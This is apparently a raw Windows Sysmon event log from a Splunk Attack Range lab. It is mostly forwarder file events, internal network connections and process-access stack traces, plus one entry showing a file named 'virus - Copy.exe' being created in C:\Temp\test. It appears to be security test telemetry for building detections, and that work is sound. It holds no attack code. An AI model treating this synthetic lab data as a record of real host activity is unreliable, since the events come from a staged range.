07:47:57.479{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0B8763740CF39A5A0CB95479D03E65,SHA256=240EBE0E67DDB0587DF58636655C4975F29F9359101E22E149FFCDCC2F212BAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806772Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:57.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73BBDCDC77430C1C09EAC87CD45F8B9D,SHA256=6A2E2BD90FCE7BE2035497BB2BC3EB973BC6FFAE052F15DDB0E0841A857CBA5F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806771Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:55.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57207-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:50.378{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50960-false10.0.1.12-8089- 23542300x80000000000000001047253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:58.493{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6DA28F84768BF0E580DADE364202B02,SHA256=5262691E7134C7CB3B3EAB6493B2DC2DAE293A26A4F9D7829E4545F1B663A638,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806773Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:58.334{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3916BD0BFC9B9843E50473255CA363EB,SHA256=FDC8C4CBC90D9493443D85CFB75EAAF9495A1DE0DB14DE955CA3BAD2CDAAC0E0,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:47:58.225{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\virus - Copy.exe2021-07-12 07:47:58.225 23542300x80000000000000001047255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0D6E7020D2D790FD19829176E7A5664,SHA256=ACE3EB042AB77FA66FD65D1C0E9AD1AD5363A5BD6B3F1B5AE1FC0A90FD4A25D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806774Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:59.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69B2F595C8C032773E373221FAD3D5CA,SHA256=537EC611A666881A7A7CF262B6E5A0F77F05DAB0C884D24568BA814888B499EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:00.522{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9E9B77AC432598B695A5FB55C77E3A,SHA256=1A21B270FF648B607D9B4CA0DFEF5C8903A76865B547DA23DAFAD423B7058431,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806775Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:00.350{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5BEBCCC413CBADED8970EE7827E0A6,SHA256=C77BC474E7F4374AA0AF537BF8CE548D92A94103D4065D8373EE049F1E435490,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047257Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:01.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F43066DDC41577799FBBACE42BD2EBD8,SHA256=5B12B157EAC7CB38F9443AA59A84B580A0BC201EF24C9A41CF3BE145CCAE388E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806776Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:01.350{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE630666EC5791902E29E6A70B40CA7,SHA256=EBBC2156276416D3B6E73DFC449AABF86A90BD9F07849EE1DD0EC1DE438BD4B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806777Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:02.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB46FFCEB6D76D0543E04377BF15AB3,SHA256=C2C1405B315C2C9E6BB63EABFC199573C9AE3EB197CB9B1CCB4453481987123E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047258Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:02.537{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=593B07DA7ED1C3F01756AF13C101BD1A,SHA256=2F4D6E3E94057690D9D42D2E59033C24A5CB8D12B6E1D5A5A03730309A93F140,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806779Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:03.381{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E550CB0BA122413BF9A037B4C6447B,SHA256=962401C0175F317E7ADD84D318F5FAE1CCD657E3E25AA332B75E3EF913578D9F,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001047268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:55.474{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-51147-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 10341000x80000000000000001047267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63569744C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047261Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.689{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047260Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:03.555{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F0E08AA6E3918F1E9A68E65EAD02895,SHA256=33A380C1508F43B717145E143225ACAA2B8C40EADAC27FBA23C604C24C6E5700,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000806778Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:01.279{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57208-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047259Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:54.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50961-false10.0.1.12-8000- 23542300x80000000000000001047271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.572{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=197A9AB4F9BDC197CB912F319BDCA544,SHA256=D83C71250D3E8E6CECBDC2177639F9161438A566A761F5DD03AB13508E91603B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806780Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:04.428{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CF11493BA679DF426062013F8595C1E,SHA256=E4252011A06FE9EEA1BB8C6A6AFFBC19971226E09B0C111406DB41EEB815AE0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.457{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06C8AE7ED812851052778A1AFE15E838,SHA256=799F0025284F0048C041692A1F13DE94ED40841D84399DD76670D79396A8275B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:04.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAEF87BD0F755745293DA7AD8FECF87C,SHA256=9C5516111B39DC8070EBEE9EC7568D95E462B1C7EC19D40B4438359DF3FE0C0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806781Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:05.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02FCF41B13CF78CE28BA0C9173D4C523,SHA256=00F1C91694E964AA799913524F77D0ED7B1E72ADF4A21635A8687405E6A700FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:05.587{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61C58A5910CDA68D038E2A9F824FC915,SHA256=5F96BF0F5DCB159D08A67CCDCBA7597861C5A0ABA546D4457B47B9AAA4144253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806787Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:06.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B6423D47DA0DD9DEAD78CCF4BD5BF2B7,SHA256=916354ED5C160319356B1DF2EFD639E6CE8D026AFDD3DF0E64173B0B56CE3CB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806786Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.709{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA3587ADE22FA55F9C7B033593FF2E72,SHA256=EF450D869872E4B738411B1A8B7EE1F4F2AAF509984AE6168D52BE0E22C60CD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806785Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.475{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17D04774DD364E96A734DB528B7D35E0,SHA256=3E83A0FA7DA420D1F280B7D12877006DE00042FD167EAEF76DE7BA815C47DA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047278Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DB54404EC7F1D6A7C6BE0731AB731B7,SHA256=1FD9D9945A4C88E8341824F956918178E7EFD15DAF23B73FCF386559ABC5DB01,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x8000000000000000806784Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806783Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806782Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:06.240{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047277Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.202{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047276Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla 
Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001047275Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla 
